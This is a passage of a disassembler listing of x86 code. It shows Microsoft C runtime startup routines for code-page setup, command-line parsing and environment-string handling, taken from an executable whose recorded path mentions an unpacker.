mov eax, offset dword_4539A0
loc_432705: ; CODE XREF: sub_4326C8+4A�j
cmp [eax], ebx
jz short loc_43277D
add eax, 30h
inc edx
cmp eax, offset dword_453A90
jl short loc_432705
lea eax, [ebp+var_18]
push eax
push ebx
call dword_4371D8 ; GetCPInfo
push 1
pop esi
cmp eax, esi
jnz loc_43284B
push 40h
and dword_676EC4, 0
pop ecx
xor eax, eax
mov edi, offset byte_676DC0
cmp [ebp+var_18], esi
rep stosd
stosb
mov dword_676C9C, ebx
jbe loc_432838
cmp [ebp+var_12], 0
jz loc_432813
lea ecx, [ebp+var_11]
loc_43275A: ; CODE XREF: sub_4326C8+145�j
mov dl, [ecx]
test dl, dl
jz loc_432813
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_43276B: ; CODE XREF: sub_4326C8+B3�j
cmp eax, edx
ja loc_432807
or byte_676DC1[eax], 4
inc eax
jmp short loc_43276B
; ---------------------------------------------------------------------------
loc_43277D: ; CODE XREF: sub_4326C8+3F�j
and [ebp+var_4], 0
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_676DC0
lea esi, [edx+edx*2]
rep stosd
shl esi, 4
stosb
lea ebx, dword_4539B0[esi]
loc_43279A: ; CODE XREF: sub_4326C8+10F�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_4327CD
loc_4327A1: ; CODE XREF: sub_4326C8+103�j
mov dl, [ecx+1]
test dl, dl
jz short loc_4327CD
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_4327C6
mov edx, [ebp+var_4]
mov dl, byte_453998[edx]
loc_4327BB: ; CODE XREF: sub_4326C8+FC�j
or byte_676DC1[eax], dl
inc eax
cmp eax, edi
jbe short loc_4327BB
loc_4327C6: ; CODE XREF: sub_4326C8+E8�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_4327A1
loc_4327CD: ; CODE XREF: sub_4326C8+D7�j
; sub_4326C8+DE�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_43279A
mov eax, [ebp+arg_0]
mov dword_676CAC, 1
push eax
mov dword_676C9C, eax
call sub_4328BF
lea esi, dword_4539A4[esi]
mov edi, offset dword_676CA0
movsd
movsd
pop ecx
mov dword_676EC4, eax
movsd
jmp short loc_432859
; ---------------------------------------------------------------------------
loc_432807: ; CODE XREF: sub_4326C8+A5�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_43275A
loc_432813: ; CODE XREF: sub_4326C8+89�j
; sub_4326C8+96�j
mov eax, esi
loc_432815: ; CODE XREF: sub_4326C8+15A�j
or byte_676DC1[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_432815
push ebx
call sub_4328BF
pop ecx
mov dword_676EC4, eax
mov dword_676CAC, esi
jmp short loc_43283F
; ---------------------------------------------------------------------------
loc_432838: ; CODE XREF: sub_4326C8+7F�j
and dword_676CAC, 0
loc_43283F: ; CODE XREF: sub_4326C8+16E�j
xor eax, eax
mov edi, offset dword_676CA0
stosd
stosd
stosd
jmp short loc_432859
; ---------------------------------------------------------------------------
loc_43284B: ; CODE XREF: sub_4326C8+5C�j
cmp dword_676A20, 0
jz short loc_432863
loc_432854: ; CODE XREF: sub_4326C8+30�j
call sub_4328F2
loc_432859: ; CODE XREF: sub_4326C8+13D�j
; sub_4326C8+181�j
call sub_43291B
jmp loc_4326EF
; ---------------------------------------------------------------------------
loc_432863: ; CODE XREF: sub_4326C8+18A�j
or esi, 0FFFFFFFFh
loc_432866: ; CODE XREF: sub_4326C8+29�j
push 19h
call sub_42DB50
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_4326C8 endp
; =============== S U B R O U T I N E =======================================
sub_432875 proc near ; CODE XREF: sub_4326C8+13�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword_676A20, 0
cmp eax, 0FFFFFFFEh
jnz short loc_432895
mov dword_676A20, 1
jmp dword_4371D0
; ---------------------------------------------------------------------------
loc_432895: ; CODE XREF: sub_432875+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_4328AA
mov dword_676A20, 1
jmp dword_4371D4
; ---------------------------------------------------------------------------
loc_4328AA: ; CODE XREF: sub_432875+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_4328BE
mov eax, dword_6769B8
mov dword_676A20, 1
locret_4328BE: ; CODE XREF: sub_432875+38�j
retn
sub_432875 endp
; =============== S U B R O U T I N E =======================================
sub_4328BF proc near ; CODE XREF: sub_4326C8+124�p
; sub_4326C8+15D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_4328EC
sub eax, 4
jz short loc_4328E6
sub eax, 0Dh
jz short loc_4328E0
dec eax
jz short loc_4328DA
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4328DA: ; CODE XREF: sub_4328BF+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_4328E0: ; CODE XREF: sub_4328BF+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_4328E6: ; CODE XREF: sub_4328BF+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_4328EC: ; CODE XREF: sub_4328BF+9�j
mov eax, 411h
retn
sub_4328BF endp
; =============== S U B R O U T I N E =======================================
sub_4328F2 proc near ; CODE XREF: sub_4326C8:loc_432854�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_676DC0
rep stosd
stosb
xor eax, eax
mov edi, offset dword_676CA0
mov dword_676C9C, eax
mov dword_676CAC, eax
mov dword_676EC4, eax
stosd
stosd
stosd
pop edi
retn
sub_4328F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43291B proc near ; CODE XREF: sub_4326C8:loc_432859�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push dword_676C9C
call dword_4371D8 ; GetCPInfo
cmp eax, 1
jnz loc_432A54
xor eax, eax
mov esi, 100h
loc_432945: ; CODE XREF: sub_43291B+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_432945
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_432996
push ebx
push edi
lea edx, [ebp+var_D]
loc_432964: ; CODE XREF: sub_43291B+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_43298B
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_43298B: ; CODE XREF: sub_43291B+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_432964
pop edi
pop ebx
loc_432996: ; CODE XREF: sub_43291B+42�j
push 0
lea eax, [ebp+var_514]
push dword_676EC4
push dword_676C9C
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_4334DD
push 0
lea eax, [ebp+var_214]
push dword_676C9C
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push dword_676EC4
call sub_430D9F
push 0
lea eax, [ebp+var_314]
push dword_676C9C
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push dword_676EC4
call sub_430D9F
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_432A11: ; CODE XREF: sub_43291B+135�j
mov dx, [ecx]
test dl, 1
jz short loc_432A2F
or byte_676DC1[eax], 10h
mov dl, [ebp+eax+var_214]
loc_432A27: ; CODE XREF: sub_43291B+127�j
mov byte_676CC0[eax], dl
jmp short loc_432A4B
; ---------------------------------------------------------------------------
loc_432A2F: ; CODE XREF: sub_43291B+FC�j
test dl, 2
jz short loc_432A44
or byte_676DC1[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_432A27
; ---------------------------------------------------------------------------
loc_432A44: ; CODE XREF: sub_43291B+117�j
and byte_676CC0[eax], 0
loc_432A4B: ; CODE XREF: sub_43291B+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_432A11
jmp short loc_432A9D
; ---------------------------------------------------------------------------
loc_432A54: ; CODE XREF: sub_43291B+1D�j
xor eax, eax
mov esi, 100h
loc_432A5B: ; CODE XREF: sub_43291B+180�j
cmp eax, 41h
jb short loc_432A79
cmp eax, 5Ah
ja short loc_432A79
or byte_676DC1[eax], 10h
mov cl, al
add cl, 20h
loc_432A71: ; CODE XREF: sub_43291B+174�j
mov byte_676CC0[eax], cl
jmp short loc_432A98
; ---------------------------------------------------------------------------
loc_432A79: ; CODE XREF: sub_43291B+143�j
; sub_43291B+148�j
cmp eax, 61h
jb short loc_432A91
cmp eax, 7Ah
ja short loc_432A91
or byte_676DC1[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_432A71
; ---------------------------------------------------------------------------
loc_432A91: ; CODE XREF: sub_43291B+161�j
; sub_43291B+166�j
and byte_676CC0[eax], 0
loc_432A98: ; CODE XREF: sub_43291B+15C�j
inc eax
cmp eax, esi
jb short loc_432A5B
loc_432A9D: ; CODE XREF: sub_43291B+137�j
pop esi
leave
retn
sub_43291B endp
; =============== S U B R O U T I N E =======================================
sub_432AA0 proc near ; CODE XREF: sub_432BD7+9�p
; sub_432C2F+D�p ...
cmp dword_676ECC, 0
jnz short locret_432ABB
push 0FFFFFFFDh
call sub_4326C8
pop ecx
mov dword_676ECC, 1
locret_432ABB: ; CODE XREF: sub_432AA0+7�j
retn
sub_432AA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432ABC proc near ; CODE XREF: sub_42BF95+2B�p
; sub_42BF95+A6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp dword_676CAC, 0
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
jnz short loc_432AE0
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_429D10
add esp, 0Ch
jmp short loc_432B53
; ---------------------------------------------------------------------------
loc_432AE0: ; CODE XREF: sub_432ABC+11�j
push esi
push 19h
call sub_42DAEF
mov edx, [ebp+arg_8]
pop ecx
test edx, edx
jz short loc_432B2D
mov ecx, [ebp+arg_4]
loc_432AF3: ; CODE XREF: sub_432ABC+63�j
mov al, [ecx]
dec edx
movzx esi, al
test byte_676DC1[esi], 4
mov [edi], al
jz short loc_432B17
inc edi
inc ecx
test edx, edx
jz short loc_432B23
mov al, [ecx]
dec edx
mov [edi], al
inc edi
inc ecx
test al, al
jz short loc_432B29
jmp short loc_432B1D
; ---------------------------------------------------------------------------
loc_432B17: ; CODE XREF: sub_432ABC+46�j
inc edi
inc ecx
test al, al
jz short loc_432B2D
loc_432B1D: ; CODE XREF: sub_432ABC+59�j
test edx, edx
jnz short loc_432AF3
jmp short loc_432B2D
; ---------------------------------------------------------------------------
loc_432B23: ; CODE XREF: sub_432ABC+4C�j
and byte ptr [edi-1], 0
jmp short loc_432B2D
; ---------------------------------------------------------------------------
loc_432B29: ; CODE XREF: sub_432ABC+57�j
and byte ptr [edi-2], 0
loc_432B2D: ; CODE XREF: sub_432ABC+32�j
; sub_432ABC+5F�j ...
mov eax, edx
dec edx
test eax, eax
pop esi
jz short loc_432B48
lea ecx, [edx+1]
xor eax, eax
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_432B48: ; CODE XREF: sub_432ABC+77�j
push 19h
call sub_42DB50
mov eax, [ebp+arg_0]
pop ecx
loc_432B53: ; CODE XREF: sub_432ABC+22�j
pop edi
pop ebp
retn
sub_432ABC endp
; =============== S U B R O U T I N E =======================================
sub_432B56 proc near ; CODE XREF: sub_42C1C0+E�j
push ebx
push edi
push 2
xor ebx, ebx
call sub_42DAEF
pop ecx
push 3
pop edi
cmp dword_678020, edi
jle short loc_432BCA
push esi
loc_432B6E: ; CODE XREF: sub_432B56+71�j
mov eax, dword_67700C
mov esi, edi
shl esi, 2
mov eax, [esi+eax]
test eax, eax
jz short loc_432BC0
test byte ptr [eax+0Ch], 83h
jz short loc_432B92
push eax
call sub_42A10B
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_432B92
inc ebx
loc_432B92: ; CODE XREF: sub_432B56+2D�j
; sub_432B56+39�j
cmp edi, 14h
jl short loc_432BC0
mov eax, dword_67700C
mov eax, [esi+eax]
add eax, 20h
push eax
call dword_437168 ; RtlDeleteCriticalSection
mov eax, dword_67700C
push dword ptr [esi+eax]
call sub_4298F2
mov eax, dword_67700C
pop ecx
and dword ptr [esi+eax], 0
loc_432BC0: ; CODE XREF: sub_432B56+27�j
; sub_432B56+3F�j
inc edi
cmp edi, dword_678020
jl short loc_432B6E
pop esi
loc_432BCA: ; CODE XREF: sub_432B56+15�j
push 2
call sub_42DB50
pop ecx
mov eax, ebx
pop edi
pop ebx
retn
sub_432B56 endp
; =============== S U B R O U T I N E =======================================
sub_432BD7 proc near ; CODE XREF: .text:0042C62B�p
cmp dword_676ECC, 0
jnz short loc_432BE5
call sub_432AA0
loc_432BE5: ; CODE XREF: sub_432BD7+7�j
push esi
mov esi, dword_677008
mov al, [esi]
cmp al, 22h
jnz short loc_432C17
loc_432BF2: ; CODE XREF: sub_432BD7+33�j
; sub_432BD7+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_432C0F
test al, al
jz short loc_432C0F
movzx eax, al
push eax
call sub_434D2E
test eax, eax
pop ecx
jz short loc_432BF2
inc esi
jmp short loc_432BF2
; ---------------------------------------------------------------------------
loc_432C0F: ; CODE XREF: sub_432BD7+21�j
; sub_432BD7+25�j
cmp byte ptr [esi], 22h
jnz short loc_432C21
loc_432C14: ; CODE XREF: sub_432BD7+52�j
inc esi
jmp short loc_432C21
; ---------------------------------------------------------------------------
loc_432C17: ; CODE XREF: sub_432BD7+19�j
cmp al, 20h
jbe short loc_432C21
loc_432C1B: ; CODE XREF: sub_432BD7+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_432C1B
loc_432C21: ; CODE XREF: sub_432BD7+3B�j
; sub_432BD7+3E�j ...
mov al, [esi]
test al, al
jz short loc_432C2B
cmp al, 20h
jbe short loc_432C14
loc_432C2B: ; CODE XREF: sub_432BD7+4E�j
mov eax, esi
pop esi
retn
sub_432BD7 endp
; =============== S U B R O U T I N E =======================================
sub_432C2F proc near ; CODE XREF: .text:0042C614�p
push ebx
xor ebx, ebx
cmp dword_676ECC, ebx
push esi
push edi
jnz short loc_432C41
call sub_432AA0
loc_432C41: ; CODE XREF: sub_432C2F+B�j
mov esi, dword_676924
xor edi, edi
loc_432C49: ; CODE XREF: sub_432C2F+30�j
mov al, [esi]
cmp al, bl
jz short loc_432C61
cmp al, 3Dh
jz short loc_432C54
inc edi
loc_432C54: ; CODE XREF: sub_432C2F+22�j
push esi
call sub_4293A0
pop ecx
lea esi, [esi+eax+1]
jmp short loc_432C49
; ---------------------------------------------------------------------------
loc_432C61: ; CODE XREF: sub_432C2F+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_4297B8
mov esi, eax
pop ecx
cmp esi, ebx
mov dword_6769EC, esi
jnz short loc_432C83
push 9
call sub_42C67C
pop ecx
loc_432C83: ; CODE XREF: sub_432C2F+4A�j
mov edi, dword_676924
cmp [edi], bl
jz short loc_432CC6
push ebp
loc_432C8E: ; CODE XREF: sub_432C2F+94�j
push edi
call sub_4293A0
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_432CBF
push ebp
call sub_4297B8
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_432CB2
push 9
call sub_42C67C
pop ecx
loc_432CB2: ; CODE XREF: sub_432C2F+79�j
push edi
push dword ptr [esi]
call sub_42A5D0
pop ecx
add esi, 4
pop ecx
loc_432CBF: ; CODE XREF: sub_432C2F+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_432C8E
pop ebp
loc_432CC6: ; CODE XREF: sub_432C2F+5C�j
push dword_676924
call sub_4298F2
pop ecx
mov dword_676924, ebx
mov [esi], ebx
pop edi
pop esi
mov dword_676EC8, 1
pop ebx
retn
sub_432C2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432CE8 proc near ; CODE XREF: .text:0042C60F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp dword_676ECC, ebx
push esi
push edi
jnz short loc_432CFF
call sub_432AA0
loc_432CFF: ; CODE XREF: sub_432CE8+10�j
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 104h
push esi
push ebx
call dword_43717C ; GetModuleFileNameA
mov eax, dword_677008
mov off_6769FC, esi
mov edi, esi
cmp [eax], bl
jz short loc_432D24
mov edi, eax
loc_432D24: ; CODE XREF: sub_432CE8+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_432D81
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_4297B8
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_432D54
push 8
call sub_42C67C
pop ecx
loc_432D54: ; CODE XREF: sub_432CE8+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_432D81
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov dword_6769E4, esi
pop edi
pop esi
mov dword_6769E0, eax
pop ebx
leave
retn
sub_432CE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432D81 proc near ; CODE XREF: sub_432CE8+47�p
; sub_432CE8+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_432DAB
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_432DAB: ; CODE XREF: sub_432D81+20�j
cmp byte ptr [eax], 22h
jnz short loc_432DF4
loc_432DB0: ; CODE XREF: sub_432D81+58�j
; sub_432D81+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_432DE2
test dl, dl
jz short loc_432DE2
movzx edx, dl
test byte_676DC1[edx], 4
jz short loc_432DD5
inc dword ptr [ecx]
test esi, esi
jz short loc_432DD5
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_432DD5: ; CODE XREF: sub_432D81+46�j
; sub_432D81+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_432DB0
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_432DB0
; ---------------------------------------------------------------------------
loc_432DE2: ; CODE XREF: sub_432D81+36�j
; sub_432D81+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_432DEC
and byte ptr [esi], 0
inc esi
loc_432DEC: ; CODE XREF: sub_432D81+65�j
cmp byte ptr [eax], 22h
jnz short loc_432E37
inc eax
jmp short loc_432E37
; ---------------------------------------------------------------------------
loc_432DF4: ; CODE XREF: sub_432D81+2D�j
; sub_432D81+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_432DFF
mov dl, [eax]
mov [esi], dl
inc esi
loc_432DFF: ; CODE XREF: sub_432D81+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test byte_676DC1[ebx], 4
jz short loc_432E1A
inc dword ptr [ecx]
test esi, esi
jz short loc_432E19
mov bl, [eax]
mov [esi], bl
inc esi
loc_432E19: ; CODE XREF: sub_432D81+91�j
inc eax
loc_432E1A: ; CODE XREF: sub_432D81+8B�j
cmp dl, 20h
jz short loc_432E28
test dl, dl
jz short loc_432E2C
cmp dl, 9
jnz short loc_432DF4
loc_432E28: ; CODE XREF: sub_432D81+9C�j
test dl, dl
jnz short loc_432E2F
loc_432E2C: ; CODE XREF: sub_432D81+A0�j
dec eax
jmp short loc_432E37
; ---------------------------------------------------------------------------
loc_432E2F: ; CODE XREF: sub_432D81+A9�j
test esi, esi
jz short loc_432E37
and byte ptr [esi-1], 0
loc_432E37: ; CODE XREF: sub_432D81+6E�j
; sub_432D81+71�j ...
and [ebp+arg_10], 0
loc_432E3B: ; CODE XREF: sub_432D81+19E�j
cmp byte ptr [eax], 0
jz loc_432F24
loc_432E44: ; CODE XREF: sub_432D81+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_432E50
cmp dl, 9
jnz short loc_432E53
loc_432E50: ; CODE XREF: sub_432D81+C8�j
inc eax
jmp short loc_432E44
; ---------------------------------------------------------------------------
loc_432E53: ; CODE XREF: sub_432D81+CD�j
cmp byte ptr [eax], 0
jz loc_432F24
test edi, edi
jz short loc_432E68
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_432E68: ; CODE XREF: sub_432D81+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_432E6D: ; CODE XREF: sub_432D81+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_432E76: ; CODE XREF: sub_432D81+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_432E7F
inc eax
inc ebx
jmp short loc_432E76
; ---------------------------------------------------------------------------
loc_432E7F: ; CODE XREF: sub_432D81+F8�j
cmp byte ptr [eax], 22h
jnz short loc_432EB0
test bl, 1
jnz short loc_432EAE
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_432E9D
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_432E9D
mov eax, edx
jmp short loc_432EA0
; ---------------------------------------------------------------------------
loc_432E9D: ; CODE XREF: sub_432D81+10D�j
; sub_432D81+116�j
mov [ebp+arg_0], edi
loc_432EA0: ; CODE XREF: sub_432D81+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_432EAE: ; CODE XREF: sub_432D81+106�j
shr ebx, 1
loc_432EB0: ; CODE XREF: sub_432D81+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_432EC5
inc ebx
loc_432EB8: ; CODE XREF: sub_432D81+142�j
test esi, esi
jz short loc_432EC0
mov byte ptr [esi], 5Ch
inc esi
loc_432EC0: ; CODE XREF: sub_432D81+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_432EB8
loc_432EC5: ; CODE XREF: sub_432D81+134�j
mov dl, [eax]
test dl, dl
jz short loc_432F15
cmp [ebp+arg_10], 0
jnz short loc_432EDB
cmp dl, 20h
jz short loc_432F15
cmp dl, 9
jz short loc_432F15
loc_432EDB: ; CODE XREF: sub_432D81+14E�j
cmp [ebp+arg_0], 0
jz short loc_432F0F
test esi, esi
jz short loc_432EFE
movzx ebx, dl
test byte_676DC1[ebx], 4
jz short loc_432EF7
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_432EF7: ; CODE XREF: sub_432D81+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_432F0D
; ---------------------------------------------------------------------------
loc_432EFE: ; CODE XREF: sub_432D81+162�j
movzx edx, dl
test byte_676DC1[edx], 4
jz short loc_432F0D
inc eax
inc dword ptr [ecx]
loc_432F0D: ; CODE XREF: sub_432D81+17B�j
; sub_432D81+187�j
inc dword ptr [ecx]
loc_432F0F: ; CODE XREF: sub_432D81+15E�j
inc eax
jmp loc_432E6D
; ---------------------------------------------------------------------------
loc_432F15: ; CODE XREF: sub_432D81+148�j
; sub_432D81+153�j ...
test esi, esi
jz short loc_432F1D
and byte ptr [esi], 0
inc esi
loc_432F1D: ; CODE XREF: sub_432D81+196�j
inc dword ptr [ecx]
jmp loc_432E3B
; ---------------------------------------------------------------------------
loc_432F24: ; CODE XREF: sub_432D81+BD�j
; sub_432D81+D5�j
test edi, edi
jz short loc_432F2B
and dword ptr [edi], 0
loc_432F2B: ; CODE XREF: sub_432D81+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_432D81 endp
; =============== S U B R O U T I N E =======================================
sub_432F35 proc near ; CODE XREF: .text:0042C605�p
; sub_434A14+8C�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_676B28
push ebx
push ebp
mov ebp, dword_4371C0
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_432F83
call ebp ; dword_4371C0
mov esi, eax
cmp esi, ebx
jz short loc_432F64
mov dword_676B28, 1
jmp short loc_432F8C
; ---------------------------------------------------------------------------
loc_432F64: ; CODE XREF: sub_432F35+21�j
call dword_4371C4 ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz loc_43305E
mov dword_676B28, 2
jmp loc_433012
; ---------------------------------------------------------------------------
loc_432F83: ; CODE XREF: sub_432F35+19�j
cmp eax, 1
jnz loc_43300D
loc_432F8C: ; CODE XREF: sub_432F35+2D�j
cmp esi, ebx
jnz short loc_432F9C
call ebp ; dword_4371C0
mov esi, eax
cmp esi, ebx
jz loc_43305E
loc_432F9C: ; CODE XREF: sub_432F35+59�j
cmp [esi], bx
mov eax, esi
jz short loc_432FB1
loc_432FA3: ; CODE XREF: sub_432F35+73�j
; sub_432F35+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_432FA3
inc eax
inc eax
cmp [eax], bx
jnz short loc_432FA3
loc_432FB1: ; CODE XREF: sub_432F35+6C�j
sub eax, esi
mov edi, dword_437074
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; dword_437074
mov ebp, eax
cmp ebp, ebx
jz short loc_433002
push ebp
call sub_4297B8
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_433002
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; dword_437074
test eax, eax
jnz short loc_432FFE
push [esp+18h+var_8]
call sub_4298F2
pop ecx
mov [esp+18h+var_8], ebx
loc_432FFE: ; CODE XREF: sub_432F35+B9�j
mov ebx, [esp+18h+var_8]
loc_433002: ; CODE XREF: sub_432F35+99�j
; sub_432F35+A8�j
push esi
call dword_4371C8 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_433060
; ---------------------------------------------------------------------------
loc_43300D: ; CODE XREF: sub_432F35+51�j
cmp eax, 2
jnz short loc_43305E
loc_433012: ; CODE XREF: sub_432F35+49�j
cmp edi, ebx
jnz short loc_433022
call dword_4371C4 ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz short loc_43305E
loc_433022: ; CODE XREF: sub_432F35+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_433032
loc_433028: ; CODE XREF: sub_432F35+F6�j
; sub_432F35+FB�j
inc eax
cmp [eax], bl
jnz short loc_433028
inc eax
cmp [eax], bl
jnz short loc_433028
loc_433032: ; CODE XREF: sub_432F35+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_4297B8
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_433048
xor esi, esi
jmp short loc_433053
; ---------------------------------------------------------------------------
loc_433048: ; CODE XREF: sub_432F35+10D�j
push ebp
push edi
push esi
call sub_429420
add esp, 0Ch
loc_433053: ; CODE XREF: sub_432F35+111�j
push edi
call dword_4371CC ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_433060
; ---------------------------------------------------------------------------
loc_43305E: ; CODE XREF: sub_432F35+39�j
; sub_432F35+61�j ...
xor eax, eax
loc_433060: ; CODE XREF: sub_432F35+D6�j
; sub_432F35+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_432F35 endp
; =============== S U B R O U T I N E =======================================
sub_433067 proc near ; CODE XREF: sub_42C67C+9�p
; sub_42C6A1+9�p
mov eax, dword_67692C
cmp eax, 1
jz short loc_43307E
test eax, eax
jnz short locret_43309F
cmp dword_451144, 1
jnz short locret_43309F
loc_43307E: ; CODE XREF: sub_433067+8�j
push 0FCh
call sub_4330A0
mov eax, dword_676B2C
pop ecx
test eax, eax
jz short loc_433094
call eax ; dword_676B2C
loc_433094: ; CODE XREF: sub_433067+29�j
push 0FFh
call sub_4330A0
pop ecx
locret_43309F: ; CODE XREF: sub_433067+C�j
; sub_433067+15�j
retn
sub_433067 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4330A0 proc near ; CODE XREF: sub_42C67C+12�p
; sub_42C6A1+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_453A90
loc_4330B3: ; CODE XREF: sub_4330A0+20�j
cmp edx, [eax]
jz short loc_4330C2
add eax, 8
inc ecx
cmp eax, offset dword_453B20
jl short loc_4330B3
loc_4330C2: ; CODE XREF: sub_4330A0+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, dword_453A90[esi]
jnz loc_4331F0
mov eax, dword_67692C
cmp eax, 1
jz loc_4331CA
test eax, eax
jnz short loc_4330F3
cmp dword_451144, 1
jz loc_4331CA
